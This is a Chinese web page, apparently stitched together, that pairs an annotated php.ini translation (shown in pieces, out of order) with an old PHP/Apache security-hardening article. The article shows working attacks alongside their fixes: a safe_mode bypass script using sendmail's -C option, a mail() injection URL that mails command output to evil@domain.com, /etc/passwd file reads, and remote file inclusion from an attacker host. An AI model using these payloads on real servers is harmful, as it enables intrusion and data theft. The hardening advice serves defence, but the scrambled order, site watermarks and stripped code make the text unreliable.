　　session.referer_check = ; 檢查 HTTP引用以使額外包含于URLs中的ids無效

　　session.entropy_length = 0 ; 從文件中讀取多少字節

　　session.entropy_file = ; 指定這裏建立 session id

　　; session.entropy_length = 16

　　; session.entropy_file = /dev/urandom

　　session.cache_limiter = nocache ; 設爲{nocache,private,public},以決定 HTTP 的

　　; 緩存問題

　　session.cache_expire = 180 ; 文檔在 n 分鍾後過時

　　session.use_trans_sid = 1 ; 使用過渡性的 sid 支持，若編譯時許可了

　　; --enable-trans-sid

　　url_rewriter.tags = "a=href,area=href,frame=src,input=src,form=fakeentry"

　　[MSSQL]

　　;extension=php_mssql.dll

　　mssql.allow_persistent = On ; 允許或禁止 持久連接

　　mssql.max_persistent = -1 ; 持久連接的最大數.-1 代表無限制

　　mssql.max_links = -1 ; 連接的最大數目（持久和非持久）.-1 代表無限制 網管u家u.bitsCN.com

　　mssql.min_error_severity = 10 ; 顯示的錯誤的最低嚴重性

　　mssql.min_message_severity = 10 ; 顯示的消息的最低重要性

　　mssql.compatability_mode = Off ; 與舊版的PHP 3.0 兼容的模式.

　　[Assertion]

　　; ？？？？？

　　;assert.active = On ; ？assert(expr); active by default

　　;assert.warning = On ; issue a PHP warning for each failed assertion.

　　;assert.bail = Off ; don't bail out by default.

　　;assert.callback = 0 ; user-function to be called if an assertion fails.

　　;assert.quiet_eval = 0 ; eval the expression with current error_reporting(). set to true if you want error_reporting(0) around the eval().

　　[Ingres II]

　　ii.allow_persistent = On ; 允許或禁止 持久連接

　　ii.max_persistent = -1 ; 持久連接的最大數.-1 代表無限制

　　ii.max_links = -1 ; 連接的最大數目（持久和非持久）.-1 代表無限制

　　ii.default_database = ; 默認 database (format : [node_id::]dbname[/srv_class]

　　ii.default_user = ; 默認 user

　　ii.default_password = ; 默認 password 網管下載dl.bitscn.com

　　[Verisign Payflow Pro]

　　pfpro.defaulthost = "test.signio.com" ; 默認的 Signio 服務器

　　pfpro.defaultport = 443 ; 連接的默認端口

　　pfpro.defaulttimeout = 30 ; 按秒計的默認超時時間

　　; pfpro.proxyaddress = ; 默認的代理的 IP 地址（如果需要）

　　; pfpro.proxyport = ; 默認的代理的端口

　　; pfpro.proxylogon = ; 默認的代理的登錄（logon 用戶名）

　　; pfpro.proxypassword = ; 默認的代理的密碼

　　[Sockets]

　　sockets.use_system_read = On ; 使用系統的read() 函數替代 php_read()封裝

　　; Local Variables: （局部變量）

　　; tab-width: 4

　　; End:

 

 

 

 

 

 

 

 

 

 

 

 

一、Web服務器安全 PHP其實不過是Web服務器的一個模塊功能，所以首先要保證Web服務器的安全。當然Web服務器要安全又必須是先保證系統安全，這樣就扯遠了，無窮無盡。PHP可以和各種Web服務器結合，這裏也只討論Apache。非常建議以chroot方式安裝啓動Apache，這樣即使Apache和PHP及其腳本出現漏洞，受影響的也只有這個禁锢的系統，不會危害實際系統。但是使用chroot的Apache後，給應用也會帶來一定的麻煩，比如連接mysql時必須用127.0.0.1地址使用tcp連接而不能用localhost實現socket連接，這在效率上會稍微差一點。還有mail函數發送郵件也是個問題，因爲php.ini裏的： [mail function] ; For Win32 only. SMTP = localhost ; For Win32 only. sendmail_from [url=mailto:=me@localhost.com]=me@localhost.com[/url] 都是針對Win32平台，所以需要在chroot環境下調整好sendmail。 二、PHP本身問題 網管u家[url=mailto:u.bitscn@com]u.bitscn@com[/url] 1、遠程溢出 PHP-4.1.2以下的所有版本都存在文件上傳遠程緩沖區溢出漏洞，而且攻擊程序已經廣泛流傳，成功率非常高. 2、遠程拒絕服務 PHP-4.2.0和PHP-4.2.1存在PHP multipart/form-data POST請求處理遠程漏洞，雖然不能獲得本地用戶權限，但是也能造成拒絕服務。 3、safe_mode繞過漏洞 還有PHP-4.2.2以下到PHP-4.0.5版本都存在PHP mail函數繞過safe_mode限制執行命令漏洞，4.0.5版本開始mail函數增加了第五個參數，由于設計者考慮不周可以突破safe_mode的限制執行命令。其中4.0.5版本突破非常簡單，只需用分號隔開後面加shell命令就可以了，比如存在PHP腳本evil.php： 執行如下的URL： [url=http://foo.com/evil.php?bar=;/usr/bin/id]http://foo.com/evil.php?bar=;/usr/bin/id[/url]　[url=mailto:mailevil@domain.com]mailevil@domain.com[/url] 這將id執行的結果發送給[url=mailto:evil@domain.com]evil@domain.com[/url]。 對于4.0.6至4.2.2的PHP突破safe_mode限制其實是利用了sendmail的-C參數，所以系統必須是使用sendmail。如下的代碼能夠突破safe_mode限制執行命令： #注意，下面這兩個必須是不存在的， 或者它們的屬主和本腳本的屬主是一樣 $script="/tmp/script123"; $cf="/tmp/cf123"; $fd = fopen($cf, "w"); fwrite($fd, "OQ/tmp Sparse=0 R$*" . chr(9) . "$#local $@ $: Mlocal, P=/bin/sh, A=sh $script"); fclose($fd); $fd = fopen($script, "w"); fwrite($fd, "rm -f $script $cf; "); fwrite($fd, $cmd); fclose($fd); mail("nobody", "", "", "", "-C$cf"); ?> 還是使用以上有問題版本PHP的用戶一定要及時升級到最新版本，這樣才能消除基本的安全問題。 三、PHP本身的安全配置 PHP的配置非常靈活，可以通過php.ini, httpd.conf, .htaccess文件（該目錄必須設置了AllowOverride All或Options）進行設置，還可以在腳本程序裏使用ini_set()及其他的特定的函數進行設置。通過phpinfo()和get_cfg_var()函數可以得到配置選項的各個值。 如果配置選項是唯一PHP_INI_SYSTEM屬性的，必須通過php.ini和httpd.conf來修改，它們修改的是PHP的Master值，但修改之後必須重啓apache才能生效。其中php.ini設置的選項是對Web服務器所有腳本生效，httpd.conf裏設置的選項是對該定義的目錄下所有腳本生效。 如果還有其他的PHP_INI_USER, PHP_INI_PERDIR, PHP_INI_ALL屬性的選項就可以使用.htaccess文件設置，也可以通過在腳本程序自身用ini_set()函數設定，它們修改的是Local值，改了以後馬上生效。但是.htaccess只對當前目錄的腳本程序生效，ini_set()函數只對該腳本程序設置ini_set()函數以後的代碼生效。各個版本的選項屬性可能不盡相同，可以用如下命令查找當前源代碼的main.c文件得到所有的選項，以及它的屬性： # grep PHP_INI_ /PHP_SRC/main/main.c 在討論PHP安全配置之前，應該好好了解PHP的safe_mode模式。 1、safe_mode safe_mode是唯一PHP_INI_SYSTEM屬性，必須通過php.ini或httpd.conf來設置。要啓用safe_mode，只需修改php.ini： safe_mode = On 或者修改httpd.conf，定義目錄： Options FollowSymLinks php_admin_value safe_mode 1 重啓apache後safe_mode就生效了。啓動safe_mode，會對許多PHP函數進行限制，特別是和系統相關的文件打開、命令執行等函數。 所有操作文件的函數將只能操作與腳本UID相同的文件，比如test.php腳本的內容爲： 幾個文件的屬性如下： # ls -la total 13 drwxr-xr-x 2 root root 104 Jul 20 01:25 . drwxr-xr-x 16 root root 384 Jul 18 12:02 .. -rw-r--r-- 1 root root 4110 Oct 26 2002 index.html -rw-r--r-- 1 www-data www-data 41 Jul 19 19:14 test.php 在浏覽器請求test.php會提示如下的錯誤信息： Warning: SAFE MODE Restriction in effect. The script whose uid/gid is 33/33 is not allowed to access ./index.html owned by uid/gid 0/0 in /var/www/test.php on line 1 如果被操作文件所在目錄的UID和腳本UID一致，那麽該文件的UID即使和腳本不同也可以訪問的，不知這是否是PHP的一個漏洞還是另有隱情。所以php腳本屬主這個用戶最好就只作這個用途，絕對禁止使用root做爲php腳本的屬主，這樣就達不到safe_mode的效果了。 如果想將其放寬到GID比較，則打開 safe_mode_gid可以考慮只比較文件的GID，可以設置如下選項： safe_mode_gid = On 設置了safe_mode以後，所有命令執行的函數將被限制只能執行php.ini裏safe_mode_exec_dir指定目錄裏的程序，而且shell_exec、`ls -l`這種執行命令的方式會被禁止。如果確實需要調用其它程序，可以在php.ini做如下設置： safe_mode_exec_dir = /usr/local/php/exec 然後拷貝程序到該目錄，那麽php腳本就可以用system等函數來執行該程序。而且該目錄裏的shell腳本還是可以調用其它目錄裏的系統命令。 safe_mode_include_dir string 當從此目錄及其子目錄（目錄必須在 include_path 中或者用完整路徑來包含）包含文件時越過 UID/GID 檢查。 從 PHP 4.2.0 開始，本指令可以接受和 include_path 指令類似的風格用分號隔開的路徑，而不只是一個目錄。 指定的限制實際上是一個前綴，而非一個目錄名。這也就是說「safe_mode_include_dir = /dir/incl」將允許訪問「/dir/include」和「/dir/incls」，如果它們存在。如果您希望將訪問控制在一個指定的目錄，那麽請在結尾加上一個斜線，例如：「safe_mode_include_dir = /dir/incl/」。 safe_mode_allowed_env_vars string 設置某些環境變量可能是潛在的安全缺口。本指令包含有一個逗號分隔的前綴列表。在安全模式下，用戶只能改變那些名字具有在這裏提供的前綴的環境變量。默認情況下，用戶只能設置以 PHP_ 開頭的環境變量（例如 PHP_FOO = BAR）。 注: 如果本指令爲空，PHP 將使用戶可以修改任何環境變量！ safe_mode_protected_env_vars string 本指令包含有一個逗號分隔的環境變量的列表，最終用戶不能用 putenv() 來改變這些環境變量。甚至在 safe_mode_allowed_env_vars 中設置了允許修改時也不能改變這些變量。 雖然safe_mode不是萬能的（低版本的PHP可以繞過），但還是強烈建議打開安全模式，在一定程度上能夠避免一些未知的攻擊。不過啓用safe_mode會有很多限制，可能對應用帶來影響，所以還需要調整代碼和配置才能和諧。被安全模式限制或屏蔽的函數可以參考PHP手冊。 討論完safe_mode後，下面結合程序代碼實際可能出現的問題討論如何通過對PHP服務器端的配置來避免出現的漏洞。 2、變量濫用 PHP默認register_globals = On，對于GET, POST, Cookie, Environment, Session的變量可以直接注冊成全局變量。它們的注冊順序是variables_order = "EGPCS"（可以通過php.ini修改），同名變量variables_order右邊的覆蓋左邊，所以變量的濫用極易造成程序的混亂。而且腳本程序員往往沒有對變量初始化的習慣，像如下的程序片斷就極易受到攻擊： //test_1.php if ($pass == "hello") $auth = 1; if ($auth == 1) echo "some important information"; else echo "nothing"; ?> 攻擊者只需用如下的請求就能繞過檢查： [url=http://victim/test_1.php?auth=1]http://victim/test_1.php?auth=1[/url] 這雖然是一個很弱智的錯誤，但一些著名的程序也有犯過這種錯誤，比如phpnuke的遠程文件拷貝漏洞：[url=http://www.securityfocus.com/bid/3361]http://www.securityfocus.com/bid/3361[/url] PHP-4.1.0發布的時候建議關閉register_globals，並提供了7個特殊的數組變量來使用各種變量。對于從GET、POST、COOKIE等來的變量並不會直接注冊成變量，必需通過數組變量來存取。PHP-4.2.0發布的時候，php.ini默認配置就是register_globals = Off。這使得程序使用PHP自身初始化的默認值，一般爲0，避免了攻擊者控制判斷變量。 解決方法： 配置文件php.ini設置register_globals = Off。 要求程序員對作爲判斷的變量在程序最開始初始化一個值。 3、文件打開 極易受攻擊的代碼片斷： //test_2.php if (!($str = readfile("$filename"))) { echo("Could not open file: $filename \n"); exit; } else { echo $str; } ?> 由于攻擊者可以指定任意的$filename，攻擊者用如下的請求就可以看到/etc/passwd： [url=http://victim/test_2.php?filename=/etc/passwd]http://victim/test_2.php?filename=/etc/passwd[/url] 如下請求可以讀php文件本身： [url=http://victim/test_2.php?filename=test_2.php]http://victim/test_2.php?filename=test_2.php[/url] PHP中文件打開函數還有fopen(), file()等，如果對文件名變量檢查不嚴就會造成服務器重要文件被訪問讀取。 解決方法： 如非特殊需要，把php的文件操作限制在web目錄裏面。以下是修改apache配置文件httpd.conf的一個例子： php_admin_value open_basedir /usr/local/apache/htdocs 重啓apache後，/usr/local/apache/htdocs目錄下的PHP腳本就只能操作它自己目錄下的文件了，否則PHP就會報錯： Warning: open_basedir restriction in effect. File is in wrong directory in xxx on line xx. 使用safe_mode模式也能避免這種問題，前面已經討論過了。 4、包含文件 極易受攻擊的代碼片斷： //test_3.php if(file_exists($filename)) include("$filename"); ?> 這種不負責任的代碼會造成相當大的危害，攻擊者用如下請求可以得到/etc/passwd文件： [url=http://victim/test_3.php?filename=/etc/passwd]http://victim/test_3.php?filename=/etc/passwd[/url] 如果對于Unix版的PHP（Win版的PHP不支持遠程打開文件）攻擊者可以在自己開了http或ftp服務的機器上建立一個包含shell命令的文件，如[url=http://attack/attack.txt]http://attack/attack.txt[/url]的內容是，那麽如下的請求就可以在目標主機執行命令ls /etc： [url=http://victim/test_3.php?filename=http://attack/attack.txt]http://victim/test_3.php?filename=http://attack/attack.txt[/url] 攻擊者甚至可以通過包含apache的日志文件access.log和error.log來得到執行命令的代碼，不過由于幹擾信息太多，有時不易成功。 對于另外一種形式，如下代碼片斷： //test_4.php include("$lib/config.php"); ?> 攻擊者可以在自己的主機建立一個包含執行命令代碼的config.php文件，然後用如下請求也可以在目標主機執行命令： [url=http://victim/test_4.php?lib=http://attack]http://victim/test_4.php?lib=http://attack[/url] PHP的包含函數有include(), include_once(), require(), require_once。如果對包含文件名變量檢查不嚴就會對系統造成嚴重危險，可以遠程執行命令。 解決方法： 要求程序員包含文件裏的參數盡量不要使用變量，如果使用變量，就一定要嚴格檢查要包含的文件名，絕對不能由用戶任意指定。 如前面文件打開中限制PHP操作路徑是一個必要的選項。另外，如非特殊需要，一定要關閉PHP的遠程文件打開功能。修改php.ini文件： allow_url_fopen = Off 重啓apache [PHP]　 ; PHP還是一個不斷發展的工具，其功能還在不斷地刪減　 ; 而php.ini的設置更改可以反映出相當的變化，　 ; 在使用新的PHP版本前，研究一下php.ini會有好處的　 ;;;;;;;;;;;;;;;;;;;　 ; 關于這個文件 ;　 ;;;;;;;;;;;;;;;;;;;　 ; 這個文件控制了PHP許多方面的觀點.爲了讓PHP讀取這個文件，它必須被命名爲　 ; 'php.ini'.PHP 將在這些地方依次查找該文件：當前工作目錄；環境變量PHPRC　 ; 指明的路徑；編譯時指定的路徑.　 ; 在windows下，編譯時的路徑是Windows安裝目錄.　 ; 在命令行模式下，php.ini的查找路徑可以用 -c 參數替代.　 ; 該文件的語法非常簡單.空白字符和用分號';'開始的行被簡單地忽略（就象你可能　 ; 猜到的一樣）. 章節標題（例如 : [Foo]）也被簡單地忽略，即使將來它們可能　 ; 有某種的意義.　 ;　 ; 指示被指定使用如下語法：　 ; 指示標識符 = 值　 ; directive = value　 ; 指示標識符 是 *大小寫敏感的* - foo=bar 不同于 FOO = bar.　 ;　 ; 值可以是一個字符串，一個數字，一個 PHP 常量 (如： E_ALL or M_PI), INI 常量中的　 ; 一個 (On, Off, True, False, Yes, No and None) ，或是一個表達式　 ; (如: E_ALL & ~E_NOTICE), 或是用引號括起來的字符串("foo").　 ;　 ; INI 文件的表達式被限制于位運算符和括號.　 ; | bitwise OR　 ; & bitwise AND　 ; ~ bitwise NOT　 ; ! boolean NOT　 ;　 ; 布爾標志可用 1, On, True or Yes 這些值置于開的狀態.　 ; 它們可用 0, Off, False or No 這些值置于關的狀態.　 ;　 ; 一個空字符串可以用在等號後不寫任何東西表示，或者用 None 關鍵字:　 ;　 ; foo = ; 將foo置爲空字符串　 ; foo = none ; 將foo置爲空字符串　 ; foo = "none" ; 將foo置爲字符串'none'　 ;　 ; 如果你值設置中使用常量，而這些常量屬于動態調入的擴展庫（不是 PHP 的擴展，就是　 ; Zend 的擴展），你僅可以調入這些擴展的行*之後*使用這些常量.　 ;　 ; 所有在 php.ini-dist 文件裏設定的值與內建的默認值相同（這是說，如果 php.ini　 ; 沒被使用或者你刪掉了這些行，默認值與之相同）.　 ;;;;;;;;;;;;;;;;;;;;　 ; 語言選項 ;　 ;;;;;;;;;;;;;;;;;;;;　 engine = On　 ; 使 PHP scripting language engine（PHP 腳本語言引擎）在 Apache下有效.　 short_open_tag = On　 ; 允許 <? 標識（這種簡單表示）. 僅有 <?php and <script> tags 將被識別.　 asp_tags = Off　 ; 允許ASP-style <% %> tags　 precision = 14　 ; 浮點類型數顯示時的有效位數　 y2k_compliance = Off　 ; 是否打開 2000年適應 (可能在非Y2K適應的浏覽器中導致問題)　 output_buffering = Off　 ; 輸出緩存允許你甚至在輸出正文內容之後發送 header（標頭，包括cookies）行　 ; 其代價是輸出層減慢一點點速度.你可以使用輸出緩存在運行時打開輸出緩存，　 ; 或者在這裏將指示設爲 On 而使得所有文件的輸出緩存打開.　 output_handler = ; 你可以重定向你的腳本的所有輸出到一個函數，　 ; 那樣做可能對處理或以日志記錄它有用.　 ; 例如若你將這個output_handler 設爲"ob_gzhandler",　 ; 則輸出會被透明地爲支持gzip或deflate編碼的浏覽器壓縮.　 ; 設一個輸出處理器自動地打開輸出緩沖.　 implicit_flush = Off　 ; 強制flush（刷新）讓PHP 告訴輸出層在每個輸出塊之後自動刷新自身數據.　 ; 這等效于在每個 print() 或 echo() 調用和每個 HTML 塊後調用flush()函數.　 ; 打開這項設置會導致嚴重的運行時沖突，建議僅在debug過程中打開.　 allow_call_time_pass_reference = On　 ; 是否讓強迫函數調用時按引用傳遞參數.這一方法遭到抗議，　 ; 並可能在將來版本的PHP/Zend裏不再支持.　 ; 受到鼓勵的指定哪些參數按引用傳遞的方法是在函數聲明裏.　 ; 你被鼓勵嘗試關閉這一選項並確認你的腳本仍能正常工作，以保證在將來版本的語言裏　 ; 它們仍能工作.（你將在每次使用該特點時得到一個警告，而參數將按值而不是按引用　 ; 傳遞）.　 ; Safe Mode 安全模式　 safe_mode = Off　 safe_mode_exec_dir =　 safe_mode_allowed_env_vars = PHP_　 ; ？Setting certain environment variables　 ; ？may be a potential security breach.　 ; 該指示包含用逗號分隔的前綴列表.安全模式中，用戶僅可以替換　 ; 以在此列出的前綴開頭的環境變量的值.　 ; 默認地，用戶將僅能 設定以PHP_開頭的環境變量，（如: PHP_FOO=BAR）.　 ; 注意: 如果這一指示爲空，PHP 將讓用戶更改任意環境變量!　 safe_mode_protected_env_vars = LD_LIBRARY_PATH　 ; 這條指示包含一個用逗號分隔的環境變量列表，那是最終用戶將不能用putenv () 更改的.　 ; 這些變量甚至在safe_mode_allowed_env_vars 設置爲允許的情況下得到保護.　 disable_functions =　 ; 這條指示讓你可以爲了安全的原因讓特定函數失效.　 ; 它接受一個用逗號分隔的函數名列表.　 ; 這條指示 *不受* 安全模式是否打開的影響.　 ; 語法高亮模式的色彩.　 ; 只要能被<font color=???>接受的東西就能工作.　 highlight.string = #DD0000　 highlight.comment = #FF8000　 highlight.keyword = #007700　 highlight.bg = #FFFFFF　 highlight.default = #0000BB　 highlight.html = #000000　 ; Misc 雜項　 expose_php = Off　 ; 決定 PHP 是否標示它裝在服務器上的事實（例如：加在它 —PHP—給Web服務　 ; 發送的信號上）.　 ; （我個人的意見，在出現什麽power-by的header的時候，把這關掉.）　 ; 它不會有安全上的威脅, 但它使檢查你的服務器上是否安裝了PHP成爲了可能.　 ;;;;;;;;;;;;;;;;;;;　 ; Resource Limits ;　 ;;;;;;;;;;;;;;;;;;;　 max_execution_time = 30 ; 每個腳本的最大執行時間, 按秒計　 memory_limit = 8388608 ; 一個腳本最大可使用的內存總量 (這裏是8MB)　 ;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;　 ; Error handling and logging ;　 ; 出錯控制和登記 ;　 ;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;　 ; 錯誤報告是按位的.或者將數字加起來得到想要的錯誤報告等級.　 ; E_ALL - 所有的錯誤和警告　 ; E_ERROR - 致命性運行時錯　 ; E_WARNING - 運行時警告（非致命性錯）　 ; E_PARSE - 編譯時解析錯誤　 ; E_NOTICE - 運行時提醒(這些經常是是你的代碼的bug引起的，　 ;也可能是有意的行爲造成的.(如：基于未初始化的變量自動初始化爲一個　 ;空字符串的事實而使用一個未初始化的變量)　 ; E_CORE_ERROR - 發生于PHP啓動時初始化過程中的致命錯誤　 ; E_CORE_WARNING - 發生于PHP啓動時初始化過程中的警告(非致命性錯)　 ; E_COMPILE_ERROR - 編譯時致命性錯　 ; E_COMPILE_WARNING - 編譯時警告(非致命性錯)　 ; E_USER_ERROR - 用戶産生的出錯消息　 ; E_USER_WARNING - 用戶産生的警告消息　 ; E_USER_NOTICE - 用戶産生的提醒消息　 ; 例子:　 ; error_reporting = E_ALL & ~E_NOTICE ; 顯示所有的錯誤，除了提醒　 ; error_reporting = E_COMPILE_ERROR|E_ERROR|E_CORE_ERROR ; 僅顯示錯誤　 error_reporting = E_ALL & ~E_NOTICE ; 顯示所有的錯誤，除了提醒　 display_errors = On ; 顯示出錯誤信息(作爲輸出的一部分)　 ; 在最終發布的web站點上，強烈建議你關掉這個特性，並使用　 ; 錯誤日志代替（參看下面）.　 ; 在最終發布的web站點繼續讓 display_errors 有效可能　 ; 暴露一些有關安全的信息，例如你的web服務上的文件路徑、　 ; 你的數據庫規劃或別的信息.　 display_startup_errors = Off ; 甚至當display_erroes打開了，發生于PHP的啓動的步驟中　 ; 的錯誤也不會被顯示.　 ; 強烈建議保持使 display_startup_errors 關閉，　 ; 除了在改錯過程中.　 log_errors = Off ; 在日志文件裏記錄錯誤（服務器指定的日志，stderr標准錯誤輸出，或error_log(下面的））　 ; 正如上面說明的那樣，強烈建議你在最終發布的web站點以日志記錄錯誤　 ; 取代直接錯誤輸出.　 track_errors = Off ; 保存最近一個 錯誤/警告 消息于變量 $php_errormsg (boolean)　 ;error_prepend_string = "<font color=ff0000>" ; 于錯誤信息前輸出的字符串　 ;error_append_string = "</font>" ; 于錯誤信息後輸出的字符串　 ;error_log = filename ; 記錄錯誤日志于指定文件　 ;error_log = syslog ; 記錄錯誤日志于系統日志 syslog (NT 下的事件日志, Windows 95下無效)　 warn_plus_overloading = Off ; 當將『+』用于字符串時警告　 ;;;;;;;;;;;;;;;;;　 ; Data Handling ;　 ;;;;;;;;;;;;;;;;;　variables_order = "EGPCS" ; 這條指示描述了PHP 記錄　 ; GET, POST, Cookie, Environment and Built-in 這些變量的順序.　 ; （以 G, P, C, E & S 代表，通常以 EGPCS 或 GPC 的方式引用）.　 ; 按從左到右記錄，新值取代舊值.　 register_globals = On ; 是否將這些 EGPCS 變量注冊爲全局變量.　 ; 若你不想讓用戶數據不在全局範圍內混亂的話，你可能想關閉它.　 ; 這和 track_vars 連起來用更有意義 — 這樣你可以通過　 ; $HTTP_*_VARS[] 數組訪問所有的GPC變量.　 register_argc_argv = On ; 這條指示告訴 PHP 是否聲明 argv和argc 變量　 ; （注：這裏argv爲數組,argc爲變量數）　 ; （其中包含用GET方法傳來的數據）.　 ; 若你不想用這些變量，你應當關掉它以提高性能.　 track_vars = On ; 使$HTTP_*_VARS[]數組有效，這裏*在使用時用　 ; ENV, POST, GET, COOKIE or SERVER替換　 post_max_size = 8M ; PHP將接受的POST數據最大大小.　 gpc_order = "GPC" ; 這條指示被人反對.用 variables_order 代替.　 ; Magic quotes　 magic_quotes_gpc = On ; 在輸入的GET/POST/Cookie數據裏使用魔術引用　 ; （原文就這樣，呵呵，所謂magic quotes 應該是指用轉義符加在引用性的控制字符上，如 \'....）　 magic_quotes_runtime= Off ; 對運行時産生的數據使用魔術引用，　 ; 例如：用SQL查詢得到的數據，用exec()函數得到的數據，等等　 magic_quotes_sybase = Off ; 采用 Sybase形式的魔術引用（用 '' 脫出 ' 而不用 \'）　 ; 自動在 PHP 文檔之前和之後添加文件　 auto_prepend_file =　 auto_append_file =　 ; 象4.04b4一樣，PHP 默認地總是在 「Content-type:」 頭標輸出一個字符的編碼方式.　 ; 讓輸出字符集失效，只要設置爲空.　 ; PHP 的內建默認值是 text/html　 default_mimetype = "text/html"　 ;default_charset = "iso-8859-1"　 ;;;;;;;;;;;;;;;;;;;;;;;;;　 ; Paths and Directories ;　 ;;;;;;;;;;;;;;;;;;;;;;;;;　 include_path = ; include 路徑設置，UNIX: "/path1:/path2" Windows: "\path1;\path2"　 doc_root = ; php 頁面的根路徑，僅在非空時有效　 user_dir = ; 告知 php 在使用 /~username 打開腳本時到哪個目錄下去找，僅在非空時有效　 ;upload_tmp_dir = ; 存放用HTTP協議上載的文件的臨時目錄（在沒指定時使用系統默認的）　 upload_max_filesize = 2097152 ; 文件上載默認地限制爲2 Meg　 extension_dir = c:\php\ ; 存放可加載的擴充庫（模塊）的目錄　 enable_dl = On ; 是否使dl()有效.　 ; 在多線程的服務器上 dl()函數*不能*很好地工作，　 ; 例如IIS or Zeus，並在其上默認爲禁止　 ;;;;;;;;;;;;;;;;　 ; File Uploads ;　 ;;;;;;;;;;;;;;;;　 file_uploads = On ; 是否允許HTTP方式文件上載　 ;upload_tmp_dir = ; 用于HTTP上載的文件的臨時目錄（未指定則使用系統默認）　 upload_max_filesize = 2M ; 上載文件的最大許可大小　 ; Fopen wrappers ;　 ;;;;;;;;;;;;;;;;;;　 allow_url_fopen = On ; 是否允許把URLs當作http:.. 或把文件當作ftp:...　 ;;;;;;;;;;;;;;;;;;;;;;　 ; 動態擴展 ;　 ; Dynamic Extensions ;　 ;;;;;;;;;;;;;;;;;;;;;;　 ; 若你希望一個擴展庫自動加載，用下面的語法：　 ; extension=modulename.extension　 ; 例如，在windows上，　 ; extension=msql.dll　 ; or 在UNIX下,　 ; extension=msql.so　 ; 注意，這只應當是模塊的名字，不需要目錄信息放在裏面.　 ; 用上面的 extension_dir 指示指定擴展庫的位置.　 ;Windows 擴展　 ;extension=php_nsmail.dll　 extension=php_calendar.dll　 ;extension=php_dbase.dll　 ;extension=php_filepro.dll　 extension=php_gd.dll　 ;extension=php_dbm.dll　 ;extension=php_mssql.dll　 ;extension=php_zlib.dll　 ;extension=php_filepro.dll　 ;extension=php_imap4r2.dll　 ;extension=php_ldap.dll　 ;extension=php_crypt.dll　 ;extension=php_msql2.dll　 ;extension=php_odbc.dll　 ; 注意， MySQL的支持現在是內建的，因此，不需要用它的dll　 ;;;;;;;;;;;;;;;;;;;　 ; 模塊設定 ;　 ; Module Settings ;　 ;;;;;;;;;;;;;;;;;;;　 [Syslog]　 define_syslog_variables = Off ; 是否定義各種的系統日志變量　 ; 如：$LOG_PID, $LOG_CRON, 等等.　 ; 關掉它是個提高效率的好主意.　 ; 運行時，你可以調用函數define_syslog_variables()，來定義這些變量　 [mail function]　 SMTP = localhost ;僅用于win32系統　 sendmail_from [url=mailto:=me@localhost.com]=me@localhost.com[/url];僅用于win32系統　 ;sendmail_path = ;僅用于unix, 也可支持參數（默認的是'sendmail -t -i'）　 [Debugger]　 debugger.host = localhost　 debugger.port = 7869　 debugger.enabled = False　 [Logging]　 ; 這些配置指示用于示例的日志記錄機制.　 ; 看 examples/README.logging 以得到更多的解釋　 ;logging.method = db　 ;logging.directory = /path/to/log/directory　 [Java]　 ;java.class.path = .\php_java.jar　 ;java.home = c:\jdk　 ;java.library = c:\jdk\jre\bin\hotspot\jvm.dll　 ;java.library.path = .\　 [SQL]　 sql.safe_mode = Off　 [ODBC]　 ;uodbc.default_db = Not yet implemented　 ;uodbc.default_user = Not yet implemented　 ;uodbc.default_pw = Not yet implemented　 uodbc.allow_persistent = On ; 允許或禁止 持久連接　 uodbc.check_persistent = On ; 在重用前檢查連接是否還可用　 uodbc.max_persistent = -1 ; 持久連接的最大數.-1 代表無限制　 uodbc.max_links = -1 ; 連接的最大數目（持久和非持久）.-1 代表無限制　 網管u家u.bitsCN.com uodbc.defaultlrl = 4096 ; 控制 LONG 類型的字段.返回變量的字節數，0 代表通過（？）0 means passthru　 uodbc.defaultbinmode = 1 ; 控制 二進制數據.0 代表?????Handling of binary data. 0 means passthru, 1 return as is, 2 convert to char　 ; 見有關 odbc_binmode 和 odbc_longreadlen 的文檔以得到 uodbc.defaultlrl 和 uodbc.defaultbinmode 的解釋.　 [MySQL]　 mysql.allow_persistent = On ; 允許或禁止 持久連接　 mysql.max_persistent = -1 ; 持久連接的最大數.-1 代表無限制　 mysql.max_links = -1 ; 連接的最大數目（持久和非持久）.-1 代表無限制　 mysql.default_port = ; mysql_connect() 使用的默認端口，如不設置，mysql_connect()　 ; 將使用變量 $MYSQL_TCP_PORT，或在/etc/services 下的mysql-tcp 條目(unix)，　 ; 或在編譯是定義的 MYSQL_PORT(按這樣的順序)　 ; Win32環境，將僅檢查MYSQL_PORT.　 mysql.default_socket = ; 用于本地 MySql 連接的默認的套接字名.爲空，使用 MYSQL 內建值　 mysql.default_host = ; mysql_connect() 默認使用的主機（安全模式下無效）　 mysql.default_user = ; mysql_connect() 默認使用的用戶名（安全模式下無效）　 mysql.default_password = ; mysql_connect() 默認使用的密碼（安全模式下無效）　 ; 注意，在這個文件下保存密碼通常是一個*壞*主意　 ; *任何*可以使用PHP訪問的用戶可以運行　 ; 'echo cfg_get_var("mysql.default_password")'來顯示那個密碼!　 ; 而且當然地，任何有讀該文件權力的用戶也能看到那個密碼.　 [mSQL]　 msql.allow_persistent = On ; 允許或禁止 持久連接　 msql.max_persistent = -1 ; 持久連接的最大數.-1 代表無限制　 msql.max_links = -1 ; 連接的最大數目（持久和非持久）.-1 代表無限制　 [PostgresSQL]　 pgsql.allow_persistent = On ; 允許或禁止 持久連接　 pgsql.max_persistent = -1 ; 持久連接的最大數.-1 代表無限制　 pgsql.max_links = -1 ; 連接的最大數目（持久和非持久）.-1 代表無限制　 [Sybase]　 sybase.allow_persistent = On ; 允許或禁止 持久連接　 sybase.max_persistent = -1 ; 持久連接的最大數.-1 代表無限制　 sybase.max_links = -1 ; 連接的最大數目（持久和非持久）.-1 代表無限制　 ;sybase.interface_file = "/usr/sybase/interfaces"　 sybase.min_error_severity = 10 ; 顯示的錯誤的最低嚴重性　 sybase.min_message_severity = 10 ; 顯示的消息的最低重要性　 sybase.compatability_mode = Off ; 與舊版的PHP 3.0 兼容的模式.若打開，這將導致 PHP 自動地　 ; 把根據結果的 Sybase 類型賦予它們，　 ; 而不是把它們全當成字符串.　 ; 這個兼容模式不會永遠留著，　 ; 因此，將你的代碼進行需要的修改，　 ; 並將該項關閉.　 [Sybase-CT]　 sybct.allow_persistent = On ; 允許或禁止 持久連接　 sybct.max_persistent = -1 ; 持久連接的最大數.-1 代表無限制　 sybct.max_links = -1 ; 連接的最大數目（持久和非持久）.-1 代表無限制　 sybct.min_server_severity = 10 ; 顯示的錯誤的最低嚴重性　 sybct.min_client_severity = 10 ; 顯示的消息的最低重要性　 [bcmath]　 